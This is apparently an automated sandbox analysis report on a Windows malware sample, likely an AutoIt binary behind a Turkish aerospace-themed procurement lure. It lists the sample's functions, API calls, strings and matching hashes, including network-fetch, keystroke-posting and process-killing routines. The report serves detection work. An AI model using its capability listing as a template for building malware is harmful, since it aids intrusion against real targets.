API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 8fa7bcb50413002c58c0ceae5abc5f2a38447e9c8efe39730b567041d99bf861
Instruction ID: 5f642b9ac18ecf5b4a8bc45a8d2deebbcb94bbefd814d1b0f9241d99c06d6d13
Opcode Fuzzy Hash: 8fa7bcb50413002c58c0ceae5abc5f2a38447e9c8efe39730b567041d99bf861
Instruction Fuzzy Hash: EF31AEB560020CAFD7219F649E88ABBBBFCFB59784F14851EF546D2240DB30DD05ABA1

Function 001E989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001C3AAF,?,?,Bad directive syntax error,0021CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001E98BC
LoadStringW.USER32(00000000,?,001C3AAF,?), ref: 001E98C3

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001E9987

Strings

., xrefs: 001E996D
Line %d:, xrefs: 001E9912
Line %d (File "%s"):, xrefs: 001E992D
%s (%d) : ==> %s.: %s %s, xrefs: 001E98F1
Error: , xrefs: 001E9955

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: b3d803915e041b8af871d94a2788790acdba58401fda4be2ad408bf786f44f29
Instruction ID: 9335af832397d34f3dfe474677ad333fffde8ce743db6e228c657d7d2af63f6f
Opcode Fuzzy Hash: b3d803915e041b8af871d94a2788790acdba58401fda4be2ad408bf786f44f29
Instruction Fuzzy Hash: FC21AD3284021ABBCF15AF90CC0AEEE7739BF29704F084469F515660A2EB319B28DF11

Function 001E209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 001E20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 001E20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001E214D

Strings

details, xrefs: 001E20FB
SHELLDLL_DefView, xrefs: 001E20CC
smallicons, xrefs: 001E2115
largeicons, xrefs: 001E20E1
list, xrefs: 001E212F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 44f08dd8cfd26b7c348baef8fe57e38d436752326862e12f9fb4c8f274cd68cd
Instruction ID: f23f88b3b002058e31e47364d47da768e142b56cd7f8576b6c11e77d9ffb19f1
Opcode Fuzzy Hash: 44f08dd8cfd26b7c348baef8fe57e38d436752326862e12f9fb4c8f274cd68cd
Instruction Fuzzy Hash: 95115C7E2C8B56BBF6092321EC1BDEE339CCB16728B200016F705A50E6FFB159115514

Function 001BCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 001BCEB7
_free.LIBCMT ref: 001BCF22
_free.LIBCMT ref: 001BCF48
_free.LIBCMT ref: 001BCF71
_free.LIBCMT ref: 001BCFA9
_free.LIBCMT ref: 001BCFDA
_free.LIBCMT ref: 001BD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 001BD09C
_free.LIBCMT ref: 001BD0B5

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 85a9fe05d4b1451f6086dab6f991827fd5c11d1064f44f90ab7d6529780c619b
Instruction ID: 2844749ea7667ed65a9076e278a7cc9eb60b62ed8278fe896437779527d0b06e
Opcode Fuzzy Hash: 85a9fe05d4b1451f6086dab6f991827fd5c11d1064f44f90ab7d6529780c619b
Instruction Fuzzy Hash: C9617571A04310AFDB25AFB4EC85AFA7BA6EF12720F0441ADF80497282EB319D0187D4

Function 002150D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00215186
ShowWindow.USER32(?,00000000), ref: 002151C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 002151CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 002151D1

Part of subcall function 00216FBA: DeleteObject.GDI32(00000000), ref: 00216FE6

GetWindowLongW.USER32(?,000000F0), ref: 0021520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0021521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0021524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00215287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00215296

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 9c7704ebada0cd550670fa1f17974524851bf42c5e194143a3f39dcc2f5db43b
Instruction ID: 34d69c5a0b84cf92bacf35d9d8cac20e2ee85d7acd9722000dc2b52b5dffe862
Opcode Fuzzy Hash: 9c7704ebada0cd550670fa1f17974524851bf42c5e194143a3f39dcc2f5db43b
Instruction Fuzzy Hash: CE51E735A70629FEEF259F24CC49BD837E5EBA5311F104081F918962E0C7B599E0DF40

Function 00198B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 001D6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001D68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001D68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001D68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001D68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00198874,00000000,00000000,00000000,000000FF,00000000), ref: 001D6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001D691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00198874,00000000,00000000,00000000,000000FF,00000000), ref: 001D692D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 63fb1eb863074ea34426b94719b3f44da22e94ca5a26934f5ca11fd81a199d75
Instruction ID: cbe5ef278110d5d1a582498e0cf15fa7749451b08f79fa56912833847a2301bd
Opcode Fuzzy Hash: 63fb1eb863074ea34426b94719b3f44da22e94ca5a26934f5ca11fd81a199d75
Instruction Fuzzy Hash: 89517774600309EFDF28CF24DC99FAA7BB6EB68754F244519F902972A0DB70E990DB50

Function 001FC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001FC182
GetLastError.KERNEL32 ref: 001FC195
SetEvent.KERNEL32(?), ref: 001FC1A9

Part of subcall function 001FC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001FC272
Part of subcall function 001FC253: GetLastError.KERNEL32 ref: 001FC322
Part of subcall function 001FC253: SetEvent.KERNEL32(?), ref: 001FC336
Part of subcall function 001FC253: InternetCloseHandle.WININET(00000000), ref: 001FC341

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: a676cb5294a499668f5a3bb16e8c6414bd814afb64cf5cea70b4441639341291
Instruction ID: aa6a18c4cc0e3f7b47eed1862c3e35a5b52d07275691746dd0d7c670fce818e1
Opcode Fuzzy Hash: a676cb5294a499668f5a3bb16e8c6414bd814afb64cf5cea70b4441639341291
Instruction Fuzzy Hash: 5B31B67514060DEFDB219FA5DE48AB7BBF9FF64300B14841DFA5682611CB31D814EBA0

Function 001E25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001E3A57
Part of subcall function 001E3A3D: GetCurrentThreadId.KERNEL32 ref: 001E3A5E
Part of subcall function 001E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001E25B3), ref: 001E3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 001E25BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001E25DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001E25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 001E25E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 001E2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 001E2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 001E260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 001E2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 001E2627

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: d013e941c5a9e31bad5be151e49fb53cf6f41af611ab937c8c9b01850f8073d5
Instruction ID: f8aa6275eacc584f6e40f380201099dd3ed09473d6a73713c62ef6ac24ac5d22
Opcode Fuzzy Hash: d013e941c5a9e31bad5be151e49fb53cf6f41af611ab937c8c9b01850f8073d5
Instruction Fuzzy Hash: 7201B5302D0754BBFB1067699C8EF993E9DDBAEB11F204011F318AF0D1CEF114448A69

Function 001E1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,001E1449,?,?,00000000), ref: 001E180C
HeapAlloc.KERNEL32(00000000,?,001E1449,?,?,00000000), ref: 001E1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001E1449,?,?,00000000), ref: 001E1828
GetCurrentProcess.KERNEL32(?,00000000,?,001E1449,?,?,00000000), ref: 001E1830
DuplicateHandle.KERNEL32(00000000,?,001E1449,?,?,00000000), ref: 001E1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,001E1449,?,?,00000000), ref: 001E1843
GetCurrentProcess.KERNEL32(001E1449,00000000,?,001E1449,?,?,00000000), ref: 001E184B
DuplicateHandle.KERNEL32(00000000,?,001E1449,?,?,00000000), ref: 001E184E
CreateThread.KERNEL32(00000000,00000000,001E1874,00000000,00000000,00000000), ref: 001E1868

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 7378dc7c7273ae20239cd9a96aea494c4af035c158b70e5c510520f4e4776610
Instruction ID: adf45ec4f5ab894cc36ba49139924f328cfd84845de5f219f471833310ad2d0b
Opcode Fuzzy Hash: 7378dc7c7273ae20239cd9a96aea494c4af035c158b70e5c510520f4e4776610
Instruction Fuzzy Hash: D901BFB92C0344BFE710AB65EC4DF9B7B6CEB99B11F108411FA05DB191CA709800CB60

Function 0020A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 001ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 001ED501
Part of subcall function 001ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 001ED50F
Part of subcall function 001ED4DC: CloseHandle.KERNEL32(00000000), ref: 001ED5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0020A16D
GetLastError.KERNEL32 ref: 0020A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0020A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0020A268
GetLastError.KERNEL32(00000000), ref: 0020A273
CloseHandle.KERNEL32(00000000), ref: 0020A2C4

Strings

SeDebugPrivilege, xrefs: 0020A18F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 2b49f4e70021ea55ea30ff69404460835d11c60a891fdc9f8d4fb1428063ca06
Instruction ID: a919dc0a2290aa882a8e9355b28c0b91b9a19f6f59dcc40475f6f72d3d374cb5
Opcode Fuzzy Hash: 2b49f4e70021ea55ea30ff69404460835d11c60a891fdc9f8d4fb1428063ca06
Instruction Fuzzy Hash: 1B618C34214342AFD710DF18D494F1ABBA1AF54318F54849CE86A8B7E3C772ED45CB92

Function 00213886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00213925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0021393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00213954
_wcslen.LIBCMT ref: 00213999
SendMessageW.USER32(?,00001057,00000000,?), ref: 002139C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 002139F4

Strings

SysListView32, xrefs: 002138F7

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 0f983d70cb200a8275a16177a271d9b38ec9d27f74b835875e154509ccc29c0c
Instruction ID: afe5fbfbf395b2d42d53138e101763690cd77015c46092520b03fbb94936b295
Opcode Fuzzy Hash: 0f983d70cb200a8275a16177a271d9b38ec9d27f74b835875e154509ccc29c0c
Instruction Fuzzy Hash: AF41D631A10219ABEF21DF64CC49BEA77EAEF68350F100526F958E7281D7719DA0CB90

Function 001EBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001EBCFD
IsMenu.USER32(00000000), ref: 001EBD1D
CreatePopupMenu.USER32 ref: 001EBD53
GetMenuItemCount.USER32(01715488), ref: 001EBDA4
InsertMenuItemW.USER32(01715488,?,00000001,00000030), ref: 001EBDCC

Strings

0, xrefs: 001EBCA8
2, xrefs: 001EBD37

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 60699fee11ea3c370bbbfb2cdfe260e8349a5af7a9a906ceeb219b7339485248
Instruction ID: 677d2b2d9a20cef2973698123500bf9dd43f4944f4422824b2fca756a2b40cc0
Opcode Fuzzy Hash: 60699fee11ea3c370bbbfb2cdfe260e8349a5af7a9a906ceeb219b7339485248
Instruction Fuzzy Hash: 3151BF70A08A89ABDB14CFEADCC8BAFBBF5BF55318F248119E411A7290D7709941CB51

Function 001EC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 001EC913

Strings

stop, xrefs: 001EC8E4
info, xrefs: 001EC8B4
blank, xrefs: 001EC895
question, xrefs: 001EC8CC
warning, xrefs: 001EC8FC

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 834e82fc625b1978aa438eaa9ee54258d48ffe2ac810c2394195209de29e3027
Instruction ID: 00bb67de1c42e42d36989d4d43284bf5d5e76e81854571c7b6b24c8976b95805
Opcode Fuzzy Hash: 834e82fc625b1978aa438eaa9ee54258d48ffe2ac810c2394195209de29e3027
Instruction Fuzzy Hash: C9113A36689B47BBE7089B15DC83CAE67DCDF27318B21002EF501A61C3E7B45E0252E9

Function 001EED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 001EED2A
_wcslen.LIBCMT ref: 001EED3B
_wcslen.LIBCMT ref: 001EED79
_wcslen.LIBCMT ref: 001EEDAF
_wcslen.LIBCMT ref: 001EEDDF
_wcslen.LIBCMT ref: 001EEDEF
_wcslen.LIBCMT ref: 001EEE2B
_wcslen.LIBCMT ref: 001EEE5A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 17a277ea7ce265c67ed253a7c15f8295ac9ce2508a8861f93d07f888a748f52c
Instruction ID: 2178fcc4bb0f5c9bddbe59b66554663f1c6e4d196593f654489550a34d17c54b
Opcode Fuzzy Hash: 17a277ea7ce265c67ed253a7c15f8295ac9ce2508a8861f93d07f888a748f52c
Instruction Fuzzy Hash: FF41A069C10658B6CB11EBF4CC8AACFB7ACAF56310F548462F518E3121FB34E255C3A5

Function 0019F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,001D682C,00000004,00000000,00000000), ref: 0019F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,001D682C,00000004,00000000,00000000), ref: 001DF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,001D682C,00000004,00000000,00000000), ref: 001DF454

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 976953ed494f99fa9bfd57438e24fd2d6e0a4a5048e4adcfc690c638e2df1960
Instruction ID: 0e5950ac001bfdef4fa4e216185635a458c69d06a32d2093bf95a45aa6449ce8
Opcode Fuzzy Hash: 976953ed494f99fa9bfd57438e24fd2d6e0a4a5048e4adcfc690c638e2df1960
Instruction Fuzzy Hash: 00412A31618680FECF399B2DD88C76A7B96BB56318F15843DF087D6660C772A983CB11

Function 00212D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00212D1B
GetDC.USER32(00000000), ref: 00212D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00212D2E
ReleaseDC.USER32(00000000,00000000), ref: 00212D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00212D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00212D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00215A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00212DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00212DE1

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

